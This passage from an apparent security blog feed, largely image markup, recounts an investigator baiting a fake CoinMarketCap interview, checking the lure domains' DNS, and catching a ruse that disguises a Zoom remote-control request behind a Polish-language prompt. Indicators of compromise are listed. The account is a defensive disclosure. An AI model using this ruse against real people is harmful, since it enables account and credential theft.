xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Using Google&#8217;s Toolbox, we can run dig online.</strong></p><p><code>dig</code> is a utility used to query DNS entries for a given domain, and it&#8217;s pretty useful for recon and intel work.</p><p>The first thing we notice is that the NS records point to Cloudflare (a clever move).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BInm!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BInm!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 424w, https://substackcdn.com/image/fetch/$s_!BInm!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 848w, https://substackcdn.com/image/fetch/$s_!BInm!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 1272w, https://substackcdn.com/image/fetch/$s_!BInm!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BInm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png" width="1456" height="973" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/c493346a-0578-4297-ba62-74bdc615d241_2612x1746.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:973,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:593259,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BInm!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 424w, https://substackcdn.com/image/fetch/$s_!BInm!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 848w, https://substackcdn.com/image/fetch/$s_!BInm!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 1272w, https://substackcdn.com/image/fetch/$s_!BInm!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fc493346a-0578-4297-ba62-74bdc615d241_2612x1746.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>The second thing is a couple of TXT records:</strong> one for Google verification, and another one to declare an SPF record (also for Google).</p><p>So why Google? Why SPF? These are both related to email.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!cn2u!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!cn2u!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 424w, https://substackcdn.com/image/fetch/$s_!cn2u!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 848w, https://substackcdn.com/image/fetch/$s_!cn2u!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 1272w, https://substackcdn.com/image/fetch/$s_!cn2u!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!cn2u!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png" width="1456" height="941" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/f3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:941,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:548718,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!cn2u!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 424w, https://substackcdn.com/image/fetch/$s_!cn2u!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 848w, https://substackcdn.com/image/fetch/$s_!cn2u!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 1272w, https://substackcdn.com/image/fetch/$s_!cn2u!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Ff3331ccd-5d39-4384-8dd8-ec8b1e628b12_2612x1688.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>When checking the MX records (also email-related), we see that this domain serves a single purpose: to send emails using that domain. </p><p>There&#8217;s a second domain, from where they send the initial contact: <code>contact-coinmarketcap[.]com.</code></p><p>This one has its MX records delegated on Hostinger and its NS records on DNSOwl.</p><p><strong>With not much else to do, I waited for the day of the interview.</strong></p><p>And here&#8217;s what happened.</p><div><hr></div><h2>The meeting</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Wmrj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Wmrj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!Wmrj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!Wmrj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!Wmrj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Wmrj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic" width="460" height="460" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:460,&quot;bytes&quot;:253694,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Wmrj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!Wmrj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!Wmrj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!Wmrj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F49b1918c-8fed-4afe-925e-bfabca4863ad_1024x1024.heic 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>I jumped into the Zoom meeting and met <strong>Igor</strong> and <strong>Dirk</strong>. I was posing as someone in a position to control transactions and with visibility over user activity and personal information, a shiny bait they wouldn&#8217;t let slip by.</p><p>It was clear that <strong>Igor</strong> was the frontman, doing all the talking and introducing himself as someone super tech-savvy, born in Poland and educated abroad in the US.</p><p><strong>Dirk</strong>, on the other hand, was impersonating a real CoinMarketCap editor, using both their name and profile picture. He barely spoke, and when he did, it was only to back up something his colleague had just said.</p><p><strong>Igor</strong> asked me something quite specific: if I could change my application&#8217;s language to <strong>Polish</strong>, because <em>&#8220;his note-taking app would act up if not.&#8221;</em></p><p>He immediately tried to excuse himself, saying his English was good, but not <em>that</em> good.</p><p>To me, it was obvious:</p><p>a) He didn&#8217;t have an Eastern European accent, at all. And I recognise Eastern European accent for&#8230; reasons that I&#8217;ll share later. </p><p>b) He spoke fluent English, so it was odd he struggled to understand me.</p><p>c) Note-taking apps rely on your local system language or a manually set preference, not on the remote participant&#8217;s language.</p><p>He used this excuse to also ask which operating system I was using, supposedly to <em>&#8220;better help me change the language.&#8221;</em></p><p>I complied, for the sake of understanding the ruse. <strong>Igor</strong> warned me that the call would drop and that I&#8217;d need to <strong>restart</strong> <strong>Zoom</strong>. It did, and after rejoining, they began setting up the questionnaire. Then, suddenly, <strong>they tried their luck</strong>.</p><p>A window popped up, displaying a message in Polish with two options, also in Polish. One of them was highlighted in blue. According to <strong>Igor</strong>, it was something related to <em>the note-taking app</em>. He excused himself and asked me to click the blue button to continue.</p><p>In reality, the window was a notification that a remote participant wanted to take control of my screen (a standard Zoom feature). It did include a warning about the associated risks and permissions&#8230; but all of it was written in Polish.</p><p>If I had accepted, they would have gained full access to both my mouse and keyboard and with just a few key shortcuts, could have downloaded malware, granted remote access, or even attempted to steal files or credentials.</p><p>But their luck was far worse than mine, because they didn&#8217;t take into account two basic things:</p><p>a) I was recording the whole thing.</p><p>b) My second last name&#8230; <strong>is Polish</strong>.</p><div><hr></div><h2>Zemsta</h2><p>I decided to cut off communication and moved on to <a href="https://otx.alienvault.com/pulse/688bdd12087cf39d39d15839">emit an intelligence pulse</a> and write this article.</p><p>I&#8217;m also sharing <strong>part</strong> of our conversation here, so users and companies can be aware of this new attack vector.</p><div class="pullquote"><p><em>The following video has been edited to avoid disclosing certain indicators. <br>We may upload a full version in the future.</em></p><div class="native-video-embed" data-component-name="VideoPlaceholder" data-attrs="{&quot;mediaUploadId&quot;:&quot;5dc845db-14cf-4009-99a3-582a0f7dc4b8&quot;,&quot;duration&quot;:null}"></div></div><p></p><p>As usual, stay safe out there. Reach out to your Information Security team when in doubt, and please don&#8217;t get <em>rekt</em>.</p><p></p><div><hr></div><h2>Indicators of Compromise</h2><pre><code>Domain:team-coinmarketcap[.]com
Domain:contact-coinmarketcap[.]com
Email:dirk@team-coinmarketcap[.]com
Email:no-reply@contact-coinmarketcap[.]com</code></pre><ul><li><p><a href="https://otx.alienvault.com/pulse/688bdd12087cf39d39d15839">Intelligence Pulse on OTX</a></p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!R2sz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!R2sz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!R2sz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!R2sz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!R2sz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!R2sz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic" width="119" height="119" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1280,&quot;width&quot;:1280,&quot;resizeWidth&quot;:119,&quot;bytes&quot;:73912,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/169770698?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!R2sz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 424w, https://substackcdn.com/image/fetch/$s_!R2sz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 848w, https://substackcdn.com/image/fetch/$s_!R2sz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 1272w, https://substackcdn.com/image/fetch/$s_!R2sz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F925eaab4-5781-4ca1-9510-0254b9b29250_1280x1280.heic 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div>]]></content:encoded></item><item><title><![CDATA[Interview with the Chollima II]]></title><description><![CDATA[Prepare for trouble. And make it double.]]></description><link>https://quetzal.bitso.com/p/interview-with-the-chollima-ii</link><guid isPermaLink="false">https://quetzal.bitso.com/p/interview-with-the-chollima-ii</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Thu, 26 Jun 2025 18:00:57 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ZO0_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZO0_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZO0_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!ZO0_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!ZO0_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!ZO0_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZO0_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic" width="450" height="450" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:450,&quot;bytes&quot;:210752,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/heic&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZO0_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 424w, https://substackcdn.com/image/fetch/$s_!ZO0_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 848w, https://substackcdn.com/image/fetch/$s_!ZO0_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 1272w, https://substackcdn.com/image/fetch/$s_!ZO0_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F861c3d18-0c6f-4475-90f3-6dee9c32dcc8_1024x1024.heic 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft 